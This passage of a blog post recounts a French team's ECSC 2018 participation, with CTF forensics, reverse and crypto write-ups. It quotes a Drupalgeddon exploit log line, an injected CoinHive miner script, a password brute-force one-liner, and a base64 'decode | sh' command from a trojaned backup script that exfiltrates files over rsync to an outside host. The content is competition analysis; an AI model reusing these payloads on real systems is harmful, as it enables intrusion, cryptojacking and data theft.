Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7%29%29%3b&amp;name%5b%23type%5d=markup HTTP/1.1&quot; 200 16100 &quot;-&quot; &quot;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)&quot;
</code></pre>

<p>The last (POST) request is particularly interesting. It looks like a <code>Drupalgeddon</code>.
Still in the log file, we found a file (<code>s.php</code>) with a user agent that left no room for imagination :</p>

<pre><code class="language-bash">$ grep drupalgeddon /var/log/html/access.log
[...]
192.168.124.169 - - [23/Aug/2018:00:11:32 +0300] &quot;POST /s.php HTTP/1.1&quot; 200 166 &quot;-&quot; &quot;drupalgeddon2&quot;
192.168.124.169 - - [23/Aug/2018:00:12:04 +0300] &quot;POST /s.php HTTP/1.1&quot; 200 407 &quot;-&quot; &quot;drupalgeddon2&quot;
192.168.124.169 - - [23/Aug/2018:00:13:55 +0300] &quot;POST /s.php HTTP/1.1&quot; 200 716 &quot;-&quot; &quot;drupalgeddon2&quot;
[...]
</code></pre>

<p>The first flag was :</p>

<blockquote>
<p>drupalgeddon2</p>
</blockquote>

<h6 id="computer-slowing-down">Computer slowing down</h6>

<p>The client was complaining about his machine slowing down. We thought that a crypto miner could be responsible. The machine was really slow while navigating the internet, it was easier to make a request and analyze it than to go through the entire code.</p>

<pre><code class="language-bash">$ curl 127.0.0.1 | egrep -i miner
[...]
var miner = new CoinHive.Anonymous(&quot;xKfRd1RhnhY5cx71DrmCVJsur6bODn10&quot;, {throttle: 0.3});
[...]
</code></pre>

<p>The flag was :</p>

<blockquote>
<p>xKfRd1RhnhY5cx71DrmCVJsur6bODn10</p>
</blockquote>

<h6 id="the-injection">The injection</h6>

<p>Now that we had found the malicious JavaScript, we had to determine the PHP function that was responsible for its presence on web pages. After a thorough investigation process, we found :</p>

<pre><code class="language-bash">$ strings linux_memory.vmem | grep CoinHive
[...]
drupal_add_js('jQuery(document).ready(function () { var miner = new CoinHive.Anonymous(&quot;xKfRd1RhnhY5cx71DrmCVJsur6bODn10&quot;, {throttle: 0.3}); if (!miner.isMobile() &amp;&amp; !miner.didOptOut(14400)) {miner.start();}});','inline');
</code></pre>

<p>The <code>drupal_add_js</code> function spoke for itself, it looked like it was made to inject JS code. We had a good intuition, the flag was :</p>

<blockquote>
<p>drupal_add_js</p>
</blockquote>

<h6 id="finding-the-miner">Finding the Miner</h6>

<p>The ECSC was kind enough to give us the volatility Linux profile of the memory dump. Given that we were searching for a process, we just had to list them :</p>

<pre><code class="language-bash">$ volatility -f linux_memory.vmem --profile=Linuxprofile_ecscx86 linux_psaux
[...]
28049 33 33 ./Ocean -B -R 3
[...]
</code></pre>

<p>By googling the name of the process, we found a Monero miner. No more stupid than another, we decided to dump the process with Antoxyde :</p>

<pre><code class="language-bash">$ volatility -f linux_memory.vmem --profile=Linuxprofile_ecscx86 linux_procdump -p 28049 -D procdump_out
</code></pre>

<p>After using another thorough investigation process, we found the wallet address in the binary :</p>

<pre><code class="language-bash">$ strings -n 20 Ocean.28049.0x8048000`
[...]
new job from %s:%d diff %d
Try &quot;xmrig&quot; --help' for more information.
 built on Jul 30 2018 with GCC
463V7UzhE12Hfbzf4SUnpm4TejddnkhD8RWeJgDJt9RxBphB2BKyDLvBqPv8tDxhZfMc1iTMvMcU3VJAiQq5iAYR2YdYKun
%s: unsupported non-option argument '%s'
No pool URL supplied. Exiting.
[...]
</code></pre>

<p>The flag was :</p>

<blockquote>
<p>463V7UzhE12Hfbzf4SUnpm4TejddnkhD8RWeJgDJt9RxBphB2BKyDLvBqPv8tDxhZfMc1iTM</p>
</blockquote>

<h6 id="the-final-target">The Final Target</h6>

<p>Paul had an idea for the challenge. He though about what he would have done if he were the attacker and came up with this question :</p>

<blockquote>
<p>If I have the rights on a website and I want to spread, what can I do ?</p>
</blockquote>

<p>The answer was in the question : using Drupal forum. With this idea, he searched for something that would be able to drop a malware or something that looked like it. After a moment, he found the <code>medical insurance</code> subject, which included a link with a local address and a strange page.
After searching for the IP address in the log file, we found it and noticed that it indeed had unusual traffic.</p>

<p>The flag was :</p>

<blockquote>
<p><a href="http://192.168.124.171:8080/gR4jPFfOGn">http://192.168.124.171:8080/gR4jPFfOGn</a></p>
</blockquote>

<h5 id="slide-show">Slide show</h5>

<p>For the oral presentation, we had 5 minutes with the help of a slide show. With XeR and Nico, we prepared the content while Virtualabs briefed Gnomino on the proper way to behave.</p>

<p>The four of us thought about the questions that could come up and tried to find clear and precise answers. Finally, we rehearsed twice in front of the coaches and were on time (5 minutes !). We were ready !</p>

<p>After a long day (it was already 1 am), it was high time to join ENOENT in the hotel room to get a good night&rsquo;s sleep ❤</p>

<p><center>
<img src="https://media.giphy.com/media/MhVoc3RYZ8GmQ/giphy.gif" alt="" />
<em>Sleeping time</em>
</center></p>

<h2 id="tuesday">Tuesday</h2>

<p>Wakey wakey ! A huge English breakfast to be ready for the day, our bags to pack and our teethes to brush : let&rsquo;s head towards the competition&rsquo;s room !</p>

<h3 id="ctf-day-2">CTF - Day 2</h3>

<p>We arrived a bit early, like yesterday, switched on our machines and waited until 10am to begin the second day of the CTF. Since I knew there would be a hardware challenge this day, I decided to begin with it. I had to keep in mind that XeR, Paul, Chaign_c and I had to do the Bandstand at 11h40 am.</p>

<p>For this hardware challenge, the organizing team gave us all the necessary supplies :</p>

<ul>
<li>Arduino nano</li>
<li>USB &lt;-&gt; UART adaptater</li>
<li>4 cables</li>
</ul>

<p>Since I&rsquo;ve already worked on Arduino, I wanted to do a firmware dump with <code>avrdude</code>.</p>

<p>To try this, no matter the Arduino model, just push a code that prints on one serial port. Once the Arduino is programmed, plug it to your machine via USB while pushing the RESET button. Then it is possible to get the content of the flash memory thanks to this command :</p>

<pre><code class="language-bash">$ avrdude -p m328p -c arduino -P /dev/ttyACM0 -b 115200 -U flash:r:flash_raw.bin:r
</code></pre>

<p>Of course, it didn&rsquo;t work. Indeed, it is impossible to communicate with those ports if the debug fuses are grilled. We would have needed a specific Atmel programmer to get the memory : this is what the Italian team have done.</p>

<h3 id="bandstand-escape-game">Bandstand - &ldquo;Escape game&rdquo;</h3>

<p>11h40 am : beginning of the Bandstand. We arrived with the code we found the previous day, hoping not to loose time and that the door would opens right away.
And that is what happened ! GG to all of those who worked on it.</p>

<h4 id="room-description">Room description</h4>

<p>We arrived in a little room of about 4m². At first glance, we noticed some interesting things (it was easier if you had entered an Escape Game before) :</p>

<ul>
<li>am alarm was ringing</li>
<li>a vest was hanging on the wall, right next to the door</li>
<li>a big toolbox, sealed with 4 digits lockets on each side was resting on a little and high table</li>
<li>At the bottom of this table, another smaller toolbox, with only one locket (that opened with a key)</li>
</ul>

<h4 id="challenge-1-2">Challenge 1 &amp; 2</h4>

<p>The first challenge was the door code. The second one consisted in deactivating the alarm. Having already entered an Escape Game before, I immediately searched the vest. I found a lock picking kit (it would be useful for the third challenge).</p>

<p>Under the vest, we found the alarm. Under it were written three 4 digits codes. We got to witness XeR&rsquo;s genius for the first time : after looking at it for about 5 seconds he just deactivated the alarm. The codes looked like something like this :</p>

<blockquote>
<p>2145
7577
2909</p>
</blockquote>

<p>Those aren&rsquo;t the exact codes, I don&rsquo;t remember them. But they were also sequences of numbers.</p>

<h4 id="challenge-3">Challenge 3</h4>

<p>Second genius episode : thanks to the lock picking kit, XeR unlocked the smaller box. We accessed different things :</p>

<ul>
<li>4 pairs of wire-cutters</li>
<li>a &ldquo;blank&rdquo; sheet</li>
<li>2 UV lamps</li>
<li>2 electronic connectors</li>
<li>1 screwdrivers&rsquo; box</li>
</ul>

<h4 id="challenge-4">Challenge 4</h4>

<p>It was the challenge that took us the longest to achieve. The &ldquo;blank&rdquo; sheet wasn&rsquo;t in fact as empty as it seemed. 4 enigmas were written on it with invisible ink, we were able to read them thanks to the UV lamps.</p>

<ul>
<li>If a 3 inches cube is painted red, that we cut 1 inch cubes in the big cube and throw them, what is the probability that the upper faces are red ?</li>
<li>How many letters are there in the missing color to make a rainbow : red, yellow, green, blue, indigo and purple ?</li>
<li>How many chimneys had the Titanic ?</li>
<li>In a range from 1 to 1000, which is the least used number ?</li>
</ul>

<p>First, we split : Chaign_c and I thought about the questions while Paul and XeR tried to bruteforce the code. The missing color was &ldquo;orange&rdquo;, so the second number was 6. I found that the last number was 0.</p>

<p>With 2 missing numbers, the bruteforce was taking too long. Paul was still thinking : a probability can only be between 0 and 1 ! Given the question, the answer had to be 0.</p>

<p>We bruteforced the last digit : the Titanic had 4 chimneys . The code was :</p>

<blockquote>
<p>0640</p>
</blockquote>

<p>Game was on !</p>

<h4 id="challenge-5">Challenge 5</h4>

<p>When opening the box, we saw 5 inox plates screwed in a cross shape :</p>

<p><center>
<img src="/img/ecsc2018/caisse1.png" alt="" />
<em>Fig 5</em>: Box
</center></p>

<p>After unscrewing the plates, we found 4 little male connectors numbered from 1 to 4. I got it pretty fast : we had to plug the connectors to the center. Once plugged in, the integrated LEDs started to shine.</p>

<p>In the other compartments (in purple on the picture), there were plenty of different wires with little numbers. The link between the LEDs and the wires&rsquo; colors and their numbers was obvious. Moreover, in the toolbox we had opened, there were 4 pairs of wire cutters&hellip;</p>

<p>So with the 4 of us, 4 compartments, 4 wire cutters, and wires colored given the LED they went with&hellip; We had to cut !</p>

<p>At this moment, the game master informed us that normally, a voice was supposed to tell us that the wires had to be cut simultaneously, but it didn&rsquo;t work at the moment.</p>

<p>After a &ldquo;1, 2, 3, GO&rdquo;, cutting at &ldquo;GO&rdquo; to be synchronous, we finished the Bandstand. We solved it all in 19  minutes, making us the fastest group in all of the 6 previous ECSC&rsquo;s editions !</p>

<h3 id="back-to-the-ctf">Back to the CTF</h3>

<p>Upon returning to the CTF room, we dropped the news to the team, and resumed with the CTF. They kept going during our absence. As soon as he got to his computer, XeR entered all the Bandstand&rsquo;s flags : we were first again !</p>

<h4 id="hardware-challenge">Hardware challenge</h4>

<p>I started working on the hardware challenge again. After my failure with the flash dump, I was asking myself if the UART was on the right pins. I also asked the organizing team to check if I hadn&rsquo;t burned the Arduino card during my tests.</p>

<p>The Arduino was fully functional so I asked if it was possible to change the UART default pins. I was told that they didn&rsquo;t know but it seemed like a good hypothesis. I felt that I was on the right track, so I started to bruteforce the pins to find the transmission one (Tx - Transmitter), waiting for something to pop up on my picocom.
On the D11 pin, I had something ! Something terribly ugly, but something. Non printable characters meant that I was using the wrong baud rate. I used the default baud value for the Arduino (115,200), but after a quick baud bruteforce, I changed it to 38, 400 baud.
The picocom was asking me for a login, hurray ! Now I had to find the reception pin of the card (Rx - Receiver). I did the same thing again, but this time I knew I had the right one when what I wrote showed up on the picocom&rsquo;s prompt. The right pin was the D4.</p>

<p>In the script, it was clearly stated that we had to find both the login and the password. We tried a few classical credentials like : <code>root:root</code>, <code>admin:admin</code>, <code>root:toor</code>&hellip; But nothing.</p>

<p>I asked Paul to develop a bruteforcer and he came up with a magnificent one-liner bash :</p>

<pre><code class="language-bash">$ sleep 1s &amp;&amp; cat pass.txt | sed -e 's/^/root\n/g' | while read -r line; do xdotool type &quot;$line&quot; &amp;&amp; xdotool key Return &amp;&amp; echo &quot;$line&quot; &amp;&amp; sleep 1s; done
</code></pre>

<p>In the end, he ended up trying another credential, and it worked :</p>

<blockquote>
<p>root:admin</p>
</blockquote>

<p>So :</p>

<pre><code class="language-bash">$ sudo picocom -b 38400 /dev/ttyUSB0
[...]
Login: root
Password: admin
Flag
</code></pre>

<h4 id="other-challenges">Other challenges</h4>

<p>The whole team kept flagging while we were away, we were second and got the first place thanks to the hardware challenge ! We were overjoyed !</p>

<p>The ANSSI&rsquo;s general director, Guillaume Poupard, paid us a visit to support us and to take a few pictures. When he arrived, we were first, but not from afar. We then went to the second place, and just after he left, first again&hellip;</p>

<p>During the day, new &ldquo;CTF1&rdquo; and &ldquo;CTF2&rdquo; came up, each time we succeeded in finding the entry point but each time another team turned it off, making it impossible for the other teams to keep solving the challenge.</p>

<p>I worked on a forensic challenge : on a pcap, there was a lot of malicious traffic via RDP. We had to find which protocol had been used, which IP addresses were impacted, the attacker&rsquo;s IP address&hellip; A lot of guessing for this challenge.</p>

<p>Nico and Gnomino did the oral presentation of the forensic challenge and it seemed to have gone well. We couldn&rsquo;t know for sure until the end of the day.</p>

<p>In the mean time, ENOENT, XeR and Antoxyde finished up the crypto challenges, Sideway did some reverse and stegano with Gnomino, Paul finished a whole forensic contract, DrStache and Nico were on a huge contract about an Active Directory and Chaign_c worked on some pwn, reverse and forensic, where he was needed.</p>

<h3 id="final-countdown">Final countdown</h3>

<p>The last hour : we were first and intended to keep it that way ! Apparently, the Bandstand allowed us to be first, even if we had some minor things left to flag on the platform. We thought we had already won&hellip;</p>

<p>But 45 minutes before the end, the &ldquo;CTF3&rdquo; came up. The 3 challenges&rsquo; contract was worth 12,000 points. If one of the 5 first teams finished it, it would be first with no possibilities for the others to get by.</p>

<p>The whole team worked hard on it, we all searched and we found the entry point. DrStache found an injection in the PHP template : when sending <code>{7*7}</code>, it answered correctly <code>49</code>. We searched a way to inject a command&hellip; And at the worst time, the entry point was shut off.
I ran (everybody that really knows me won&rsquo;t believe it), to ask he organizing team to restart the machine.</p>

<p>Finally, the German exulted with joy, they got the first place 20 minutes before the end, only 2,000 points before us.</p>

<p>The CTF was getting to an end, we hoped the oral would lift us to the first place, but the German team chose the same subject and we both had the maximum  number of points. France&rsquo;s team ended up second on this first time entering the challenge, but we were a little bitter because we really thought we had it.</p>

<p><center>
<img src="http://www.epita.fr/wp-content/uploads/2018/10/retour_European_Cyber_Security_Challenge_2018_londres_equipe_France_ANSSI_hacking_international_Tanguy_EPITA_promo_2022_medaille_argent_02.jpg" alt="" />
<em>Fig 6</em>: French team
</center></p>

<h3 id="end-of-the-ctf">End of the CTF</h3>

<p>There was an end speech, thanking the organizing team, the coaches and the participants of each country. It was finally over and we went to the social event organized on the building&rsquo;s roof.</p>

<p>On the menu, vegetarian burger, 5 different beers with unlimited refill and a lot of exchange with the other teams. It was a really nice event, the Belgians organized a beer contest, we laughed a lot. We talked with the Greeks and the Germans about the CTF and other subjects.</p>

<p>Finally, the party was over. It was time to get back to the hotel to have a last drink before getting to bed and go visit London in the morning.</p>

<h2 id="wednesday">Wednesday</h2>

<p>We slept in the morning of this last day in London. We got up at 8am, had breakfast and left around 10h30 am to visit Camden Market. For certain members of the team, the event had been &ldquo;complicated&rdquo; and some preferred to stay in and rest.</p>

<p>We enjoyed London and the market, it was really chill.</p>

<p><center>
<img src="/img/ecsc2018/camdenmarket.jpg" alt="" />
<em>Fig 7</em>: Camden town
</center></p>

<p>Lunch time, we were hungry. It started raining so we found a burger restaurant&hellip; Vegan. No choice. In the end, it was really good.</p>

<p>Around 3pm, we split in two groups, some of us went back to the hotel to rest before the evening, and some of us went to see Big Ben.
After getting back to my room, I took a shower and we watched a few &ldquo;Peepoodoo&rdquo; episodes with ENOENT. Around 5pm we had to move and go to the closing ceremony. It was organized on a boat, it was really nice</p>

<p>When the boat left, we saw the Tower Bridge open just for us, it was really impressive. Then the evening started and we had something to eat, along with two drinks.</p>

<p>Finally, the organizing team began to speak. There was a whole speech on the event in itself, they thanked the sponsors and then ended with the prizes. The podium was :</p>

<ol>
<li>Germany (179,350 pts)</li>
<li>France (177,050 pts)</li>
<li>United Kingdom (169,950 pts)</li>
</ol>

<p>The first prize was really interesting, the two others less appealing.</p>

<ul>
<li>1st place : Tickets for any Black Hat for the whole team, and if they choose the EU Black Hat it comes with transportation and sleeping commodities.</li>
<li>2nd place : 500 pounds for the whole team.</li>
<li>3rd place : 250 pounds for the whole team.</li>
</ul>

<p><center>
<img src="https://www.ssi.gouv.fr/uploads/2018/10/20181017_204831-e1539877774547.jpg" alt="" />
<em>Fig 8</em>: Final french team photo
</center></p>

<p>The party kept going on, we laughed and enjoyed this last event. When we went back to the hotel, some of us went to bed, some tried hard on the hack.lu CTF and some others kept partying with the Italians !</p>

<p>I chose to call my girlfriend to kiss her good night before going to bed.</p>

<h1 id="conclusion">Conclusion</h1>

<p>To sum all this long blog post up, it was a really, really, really awesome adventure. It allowed me to judge the European level, be it our personal or France&rsquo;s team level, but most of all to meet great people, be it the coaches air the other members of our team.</p>

<p>I want to say a huge, huge &ldquo;thank you&rdquo; to the member of the ANSSI that allowed us to take part in such an event, he was really nice and supportive.</p>

<p>Regarding the CTF, some aspects need to be upgraded, mostly formatting the flags and banishing the anti-game gameplay. But those are details.
Concerning France, we could see what the event was like, we were like &ldquo;crash tests&rdquo; but we ended up doing not so bad. Next year, we will see how the ANSSI organizes the recruitment of the French team and of the coaches. A sure thing : I would gladly go to Romania to represent France !</p>

<p>Hoping to meet everybody again soon, to share a moment and a good beer !</p>

<p>Thank you for reading the whole post, I hope it wasn&rsquo;t too long and that you enjoyed it. If you have questions, whatever it is, I&rsquo;m on Twitter, LinkedIn, mail, whatever :)</p>

<p>Kisses ❤</p>

<h1 id="writeups">Writeups</h1>

<p>Je vais présenter les writeups un peu &ldquo;en vrac&rdquo;, c&rsquo;est un peu difficile de savoir quel contrat correspond à quel jour en fonction de qui à fait quoi. Donc les titres vont avoir la forme suivante:</p>

<p>I will do the writeups, but it is a bit messy, it is difficult to remember which contract matches with which day, and to know who did what. So the challenges&rsquo; tittle will have this format :</p>

<blockquote>
<p>[Nom du chall] - [Catégorie].</p>
</blockquote>

<h2 id="ma-baker-reverse">Ma Baker - Reverse</h2>

<p>This challenge is composed of two main elements. The first one is the binary (mabaker) and the second is a compressed folder of encrypted docx document. As said in the challenge decryption, we need to find a way to decrypt those files.</p>

<h3 id="the-algorithm">The algorithm</h3>

<p>After reading the machine for the whole program we extracted the core algorithm for the key setup. The keys are generated in the following way. The first part is getting the binary pid and using to seed a random number generator.</p>

<p><center>
<img src="/img/writeups/ecsc2018/mabaker1/img1.png" alt="" />
</center></p>

<p>This code seems to to a lot of complex operations, but after playing around with it by generating all possible input values for srand (the range of pids), we noticed that this code could simplified into “srand(pid % 255);”.</p>

<p>The algorithm then generates 256 different keys using rand.</p>

<p><center>
<img src="/img/writeups/ecsc2018/mabaker1/img2.png" alt="" />
</center></p>

<p>As there are only 256 possible seeds, there are only 256 combination of keys. The encryption algorithm is really simplistic, and as we can see in the following screen, it is only a simple a simple xor.</p>

<p><center>
<img src="/img/writeups/ecsc2018/mabaker1/img3.png" alt="" />
</center></p>

<h3 id="the-attack">The attack</h3>

<p>We have two critical pieces of information. The first one being that there are only 256 different arrays of keys, and the second one being that the header for docx files is known. The attack is really simple, we the first few bytes of a file, encrypt it with all possible key arrays and see which match the encrypted header. By doing this we only found one possible and it was the right one. Afterwards we only had to decrypt one of the files with the key, open it in word and get the flag !</p>

<h2 id="curious-service-pwn">Curious service - Pwn</h2>

<p>In this challenge we are being provided with a server binary, the same one is running on the service. The goal of this challenge is guessing the key that the server expects for it to send us the flag.</p>

<h3 id="the-algorithm-1">The algorithm</h3>

<p>The server program is pretty straightforward. It waits for a remote connection, gets the key from the client, generates a key on its own and compares them both. If they match we get the flag, if not we are disconnected.</p>

<p><center>
<img src="/img/writeups/ecsc2018/curiousservice/img1.png" alt="" />
</center></p>

<p>As we can see here, srand is seeded with the current time. Rand is then used to compute the key. And this is where we have a vulnerability, if the current time of our computer is the same as the one on the server (which should be the case with ntp), we can generate a valid key and get the flag</p>

<h3 id="the-attack-1">The attack</h3>

<p>As too many mistakes can be made while translating assembly code to source code, we chose to instrument a server binary with frida, simply call the generate_key function when needed and upload the key to the real server to get the flag. You can see the script we used below.</p>

<p><center>
<img src="/img/writeups/ecsc2018/curiousservice/img2.png" alt="" />
</center></p>

<p>Note: The rd-server-gathering is a patched version of the server binary to change the port of the service. It must ran before executing this script.</p>

<h2 id="ma-baker-returns-reverse">Ma Baker returns - Reverse</h2>

<p>This challenge is much like the first one as the structure is globally the same. The only difference is added “protections”.</p>

<h3 id="the-algorithm-2">The algorithm</h3>

<p>Across the binary code we can find the same pattern of instructions (add, sub, imul) that can be simplified to a modulo 255. If we look at the code we can see a few calls to SHA1 function and a few loops doing additional rounds of computation on the generated key (as seen in the screenshots below).</p>

<p><center>
<img src="/img/writeups/ecsc2018/mabaker2/img1.png" alt="" />
</center></p>

<p><center>
<img src="/img/writeups/ecsc2018/mabaker2/img2.png" alt="" />
</center></p>

<h3 id="the-attack-2">The attack</h3>

<p>This program is vulnerable in the same way as the previous version, as the seed for srand is computed through a module 255 or the pid. Which means even with the added protection, there is a very limited search space for the keys. To get the flag we only had to dump all possible keys and see which when used gave out a correct docx header. We instrumented the program using radare2 to dump all of the  keys, you can see the code below.</p>

<p><center>
<img src="/img/writeups/ecsc2018/mabaker2/img3.png" alt="" />
</center></p>

<p>We then tested all of the valid keys on an encrypted docx, and checked which document was correct. Luckily the first document we opened was the right one.</p>

<h2 id="vigenere-cipher-cracking-crypto">Vigenere Cipher Cracking - Crypto</h2>

<h3 id="finding-the-key-size">Finding the key size</h3>

<p>To find the key size, we can decompose the cipher text in blocks of size k. k being the key size we guess.By only taking the first bytes of each block and appending them in a string, we can then attempt to xor (case 0)with a single byte. Among the 256 possibilities for each k, only the right key length will produce a string containing printable characters. Using this method, we found a key size of 13.Applying the same technique on the third byte (case 2) and others confirmed the hypothesis.</p>

<h3 id="finding-the-key">Finding the key</h3>

<p>Knowing the key size, we can do the same technique as above with k=13 and test for each 13 bytes of the blocks all 256 possible key values. If the key value is correct, it should produce printable characters that could be encountered in an English text.We were able to recover the key:</p>

<p>[69,51,170,26,190,211,28,35,159,239,52,253,109]</p>

<h3 id="decrypting-the-ciphertext">Decrypting the ciphertext</h3>

<p>Decryption is simple, we reimplemented the script in Python and inverted the operations:</p>

<blockquote>
<p>+ -&gt; -</p>

<p>- -&gt; +</p>

<p>^ -&gt; ^</p>
</blockquote>

<p>We can pass the ciphertext and the key to obtain the flag.</p>

<h2 id="online-banking-otp-token">Online Banking OTP Token</h2>

<p>Firstly we open the binary in a debugger. After analyzing, we found that the seed is incremented just after the call to iseed(). We break on 0x0804979E after the seed has been incremented and modify the heap to input the wanted seed.</p>

<p>Run the binary again to obtain the wanted token.</p>

<h2 id="know-your-brand-forensic-analysis-enterprise1-forensic">Know Your Brand - Forensic Analysis [Enterprise1] - Forensic</h2>

<h3 id="setup">Setup</h3>

<p>Just downloaded the Disk Image and run &lsquo;md5sum&rsquo;</p>

<h3 id="prepare-the-volatility-image-part-1">Prepare the Volatility Image Part 1</h3>

<p>Unlike with Windows, with Linux, we need to build a specific profile for each kernel.
Mounting the Disk Image (which contains 3 partitions) revealed that there is two kernel files, vmlinuz-4.4.0-128-generic and vmlinuz-4.4.0-87-generic.</p>

<p>We guessed that the latest kernel is used, 4.4.0-87-generic.</p>

<p>We have to build the profile with the headers : &lsquo;/usr/src/linux-headers-4.4.0-128-generic/&rsquo;</p>

<h3 id="prepare-the-volatility-image-part-2">Prepare the Volatility Image Part 2</h3>

<p>We also need the correct system map located in &lsquo;/boot&rsquo;.
So it&rsquo;s &lsquo;System.map-4.4.0-128-generic&rsquo; according to the kernel version.
And the flag was : &lsquo;System.map-4.4.0-128-generic-0389596d78ec13beb366d063a4b8c5c0&rsquo;</p>

<h3 id="analyse-the-memory-dump-part-1">Analyse the Memory Dump Part 1</h3>

<p>We put our profile into the &lsquo;/tmp/linux-4.4.0-128&rsquo; and downloaded the latest version of volatility to avoid some bugs.</p>

<p>So we ran : &lsquo;python2 /tmp/volatility-master/vol.py &ndash;plugins=/tmp/linux-4.4.0-128 &ndash;profile LinuxKernel128x64 -f ~/Downloads/mem.lime.1531387925 linux_netstat&rsquo; to list all the connections.</p>

<p>We found &lsquo;TCP 172.30.20.80 :60540 10.85.220.55 : 22 ESTABLISHED ssh/24017&rsquo; which refers to a connection between a private LAN and an external network.</p>

<p>So the IP that sensitive data is being leaked to is &lsquo;10.85.220.55&rsquo;.</p>

<h3 id="analyse-the-memory-dump-part-2">Analyse the Memory Dump Part 2</h3>

<p>We ran : &lsquo;python2 /tmp/volatility-master/vol.py &ndash;plugins=/tmp/linux-4.4.0-128 &ndash;profile LinuxKernel128x64 -f ~/Downloads/mem.lime.1531387925 linux_psaux | grep 10.85.220.55&rsquo; to list all the process and keep only those which have the IP 10.85.220.55 in their command line.</p>

<p>Once we have the process with their PID, we summed them.</p>

<p>We got : &lsquo;72036&rsquo;</p>

<h3 id="locate-the-exploited-process">Locate the Exploited Process</h3>

<p>Without the grep, we saw that &lsquo;backup-manager&rsquo; was suspicious because it seems to be the parent of some leaks with rsync.</p>

<h3 id="locate-the-malicious-command">Locate the Malicious Command</h3>

<p>We checked the contents of &lsquo;/usr/share/backup-manager&rsquo; with the original deb from Ubuntu 16.04. We found that &lsquo;/usr/share/backup-manager/md5sum&rsquo; was a file that wasn&rsquo;t in the deb file and &lsquo;/usr/share/backup-manager/actions.sh&rsquo; was modified. Its permissions were 744 while the original actions.sh was 644.</p>

<h3 id="establish-the-obfuscation-mechanism">Establish the Obfuscation Mechanism</h3>

<p>When we look at the contents of &lsquo;/usr/share/backup-manager/md5sum&rsquo;, we saw &lsquo;bash -c &ldquo;echo &lsquo;cnN5bmMgLXZyeiAtLXJzaD0ic3NocGFzcyAtcCB1YnNzaGFkbWluIHNzaCAtbyBTdHJpY3RIb3N0S2V5Q2hlY2tpbmc9bm8gLWwgdWJzc2hhZG1pbiIgL2hvbWUvbGFiIHVic3NoYWRtaW5AMTAuODUuMjIwLjU1Oi9ob21lL3N0b2xlbnNlY3JldHMgJj4vZGV2L251bGwK&rsquo; | base64 -d | sh&rdquo;&rsquo; which indicate a base64 encoding.</p>

<h3 id="locate-the-malicious-call">Locate the Malicious Call</h3>

<p>We saw that &lsquo;/usr/share/backup-manager/actions.sh&rsquo; was modified and indeed, it called the malware &lsquo;md5sum&rsquo; which wasn&rsquo;t in the original.</p>

<h2 id="know-your-brand-rsa-analysis-crypto">Know Your Brand - RSA Analysis - Crypto</h2>

<h3 id="analyze-packet-capture-data">Analyze Packet Capture Data</h3>

<p>By loading the pcap into wireshark and looking at the tls traffic, we quickly come across the ciphersuite.</p>

<h3 id="decrypt-the-ssl-traffic">Decrypt the SSL traffic</h3>

<p>From wireshark , we dumped the TLS certificate in the DER format. We used openssl to convert it to PEM, and extract its public key.</p>

<pre><code class="language-bash">$ openssl x509 -inform der -in cert_extracted.der -outform pem -out cert.pem
$ openssl x509 -pubkey -noout -in cert.pem &gt; pubkey.pem
</code></pre>

<p>We then used RsaCtfTool to crack and recover the private key.</p>

<pre><code class="language-bash">$ ~/Documents/Tools/RsaCtfTool/RsaCtfTool.py --publickey pubkey.pem –private &gt; privkey.pem
</code></pre>

<p>Then we loaded the private key into wireshark and it decrypted the TLS traffic. From this point , we struggled a bit in front of the 150+ decrypted TLS streams. We used tshark to get all the decrypteed stream and grepped for “flag” in it.</p>

<pre><code class="language-bash">$ for i in {0..200}; do echo $i &amp;&amp; tshark -r cap01.pcap -q -o &quot;ssl.keys_list:172.30.11.10,443,http,privkey.pem&quot;  -z &quot;follow,ssl,ascii,$i&quot; |grep -i flag; done
</code></pre>

<p>5 minutes later, the flagged popped in our terminal.</p>

<h3 id="unzip-the-second-file">Unzip the second file</h3>

<p>Using the password of the previous step , we unziped the given zip. By looking at the README.txt file, we figured out that we need to focus on the genCsr.py file.
We looked at the commit logs for that file :</p>

<pre><code class="language-bash">$ git log – genCsr.py
</code></pre>

<p>And we found only 2 commits, which gave us all the information for the 3 last questions.</p>

	</div>
</article>

		</div>
		
	
<script src="https://use.fontawesome.com/releases/v5.2.0/js/all.js" integrity="sha256-l1iMQ6f0+8aFBzSNRxgklLlYMqu5S4b/LpaST2s+gog= sha384-4oV5EgaV02iISL2ban6c/RmotsABqE4yZxZLcYMAdG7FAPsyHYAPpywE9PJo+Khy sha512-3dlGoFoY39YEcetqKPULIqryjeClQkr2KXshhYxFXNZAgRFZElUW9UQmYkmQE1bvB8tssj3uSKDzsj8rA04Meg==" crossorigin="anonymous"></script>


    
        
        
        <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js" integrity="sha256-/BfiIkHlHoVihZdc6TFuj7MmJ0TWcWsMXkeDFwhi0zw= sha384-ZeLYJ2PNSQjvogWP559CDAf02Qb8FE5OyQicqtz/+UhZutbrwyr87Be7NPH/RgyC sha512-ExaEi+x+Zqq50MIBraxsK23lQQJZd8Q7ZDlwJsxQwsWlO8XvRouQev9ZWaFxCKdTvrgb2fmf2pglwGp61/7qZA==" crossorigin="anonymous"></script>
	
        <script type="text/javascript">
            hljs.configure({languages: []});
            hljs.initHighlightingOnLoad();
        </script>
        
        



	


	<script>
    (function() {
      var toc = document.getElementById('TableOfContents');
      if (!toc) return;
      do {
        var li, ul = toc.querySelector('ul');
        if (ul.childElementCount !== 1) break;
        li = ul.firstElementChild;
        if (li.tagName !== 'LI') break;
        
        ul.outerHTML = li.innerHTML;
      } while (toc.childElementCount >= 1);
    })();
  </script>

	</body>
</html>
